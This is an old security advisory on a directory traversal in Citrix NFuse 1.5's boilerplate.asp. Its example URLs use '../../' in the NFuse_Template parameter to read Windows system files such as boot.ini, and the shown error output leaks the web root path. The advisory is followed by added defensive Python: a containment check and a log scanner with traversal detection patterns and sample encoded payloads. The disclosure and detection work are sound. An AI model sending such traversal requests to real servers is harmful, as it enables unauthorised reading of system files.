Citrix Nfuse directory traversal with boilerplate.asp

This vulnerability is based on being an authenticated user (as opposed to a 
prior bug someone put out for unauthenticated users).

Disclaimer:
My ability to find a resource at Citrix via their web site was not 
successful, thus the post here. They have been notified thanks to some 
contacts forwarded from people on Bugtraq.
Given that you must be authenticated first, one assumes that you have some 
minimal level of trust for the end user, so the severity isn't that high.
I don't have access to large numbers of systems on which to check this and 
to check across multiple versions. This should be reproducible, no guarantees.

Solution: According to Citrix this issue is only in Nfuse 1.5 as the 
boilerplate.asp goes away in the most recent version. Assuming one 
upgrades, this and a number of other non-public (from what I can gather 
from Citrix) vulnerabilities go away. I don't have the facilities to test 
on the latest version, and for all I know something similar can be done 
there. Citrix has been notified, their solution was to upgrade.



A command such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica 

Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ 

It seems to work with things in winnt and winnt/system32; it doesn't seem 
to like things back on the c:\, which gives up its very minor vuln of the 
path of wwwroot.
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories 

Gives up:
There was an error:The Citrix HTML template specified does not exist or 
could not be accessed. The template file specified was: 
c:\inetpub\wwwroot\../../boot.ini
Nice but lacking much use. So it seems we have another directory traversal 
issue.


Credits: Professionally I work for Foundstone (www.foundstone.com). This 
wouldn't have been found w/o a client engagement through them. 
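Two defender-side checks for the pattern described above, written as an added example for this archive page (not code from the poster, Foundstone or Citrix). The first is the containment check a template loader such as boilerplate.asp needs: join the requested template name to the document root, normalise away `..` and `.` segments, and refuse anything that lands outside the root. The second scans web-server access logs for requests whose NFuse_Template or NFuse_CurrentFolder parameter carries a `..` segment, after URL-decoding (including double encoding and backslash separators). The document root and the log lines are constructed for the example.

```python
"""Containment check and log detection for the NFuse boilerplate.asp traversal.

Added example; the web root, log format and log lines below are constructed.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/inetpub/wwwroot"  # constructed stand-in for c:\inetpub\wwwroot

# Query parameters the post shows being used to steer the template lookup.
WATCHED_PARAMS = ("NFuse_Template", "NFuse_CurrentFolder")

# A '..' path segment bounded by '/', '\' or the string ends.
TRAVERSAL_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Common-log-format line: client ip, then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<url>\S+)')


def resolve_template(web_root, template):
    """Return the normalised template path if it stays inside web_root, else None.

    This is the check the template loader lacked: backslashes are treated as
    separators (the target is IIS on Windows), the joined path is normalised so
    '..' segments collapse, and the result must still have web_root as a prefix
    component-wise (so 'wwwroot2/x' cannot pass as a child of 'wwwroot').
    """
    root = posixpath.normpath(web_root)
    cleaned = template.replace("\\", "/")
    # join() discards root when cleaned is absolute, so '/boot.ini' fails below.
    candidate = posixpath.normpath(posixpath.join(root, cleaned))
    if candidate == root or posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e (double-encoded '..') is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_traversal_requests(log_lines):
    """Return (client_ip, param, decoded_value) for each watched parameter
    that contains a '..' segment after full decoding."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip, don't crash
        query = urlsplit(match.group("url")).query
        params = parse_qs(query)  # parse_qs already decodes one layer
        for name in WATCHED_PARAMS:
            for raw in params.get(name, []):
                value = decode_fully(raw)
                if TRAVERSAL_SEGMENT.search(value):
                    hits.append((match.group("ip"), name, value))
    return hits


# Constructed access-log sample: one legitimate request, then variants of the
# traversal pattern (plain, percent-encoded, backslash, double-encoded).
SAMPLE_LOG = [
    '10.0.0.5 - jdoe [12/Mar/2002:10:01:02 -0500] "GET /boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica HTTP/1.0" 200 1532',
    '10.0.0.5 - jdoe [12/Mar/2002:10:01:40 -0500] "GET /boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ HTTP/1.0" 200 2048',
    '10.0.0.9 - - [12/Mar/2002:10:02:11 -0500] "GET /boilerplate.asp?NFuse_Template=%2e%2e%2f%2e%2e%2fboot.ini&NFuse_CurrentFolder=/ HTTP/1.0" 500 310',
    '10.0.0.9 - - [12/Mar/2002:10:02:12 -0500] "GET /boilerplate.asp?NFuse_Template=..%5c..%5cwinnt%5cwin.ini HTTP/1.0" 200 900',
    '10.0.0.9 - - [12/Mar/2002:10:02:13 -0500] "GET /boilerplate.asp?NFuse_Template=%252e%252e%252fboot.ini HTTP/1.0" 500 310',
]


if __name__ == "__main__":
    for ip, name, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {name}={value!r} -> "
              f"resolves to {resolve_template(WEB_ROOT, value)}")
```

The containment check is what makes the upgrade advice concrete: once the loader rejects any resolved path that leaves the document root, `../../winnt/system32/axperf.ini` and `../../boot.ini` both fail before any file access, and the error message no longer needs to echo the joined path. The log scanner decodes before matching, because a single `unquote` misses the double-encoded form and a `/`-only regex misses the IIS backslash form.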

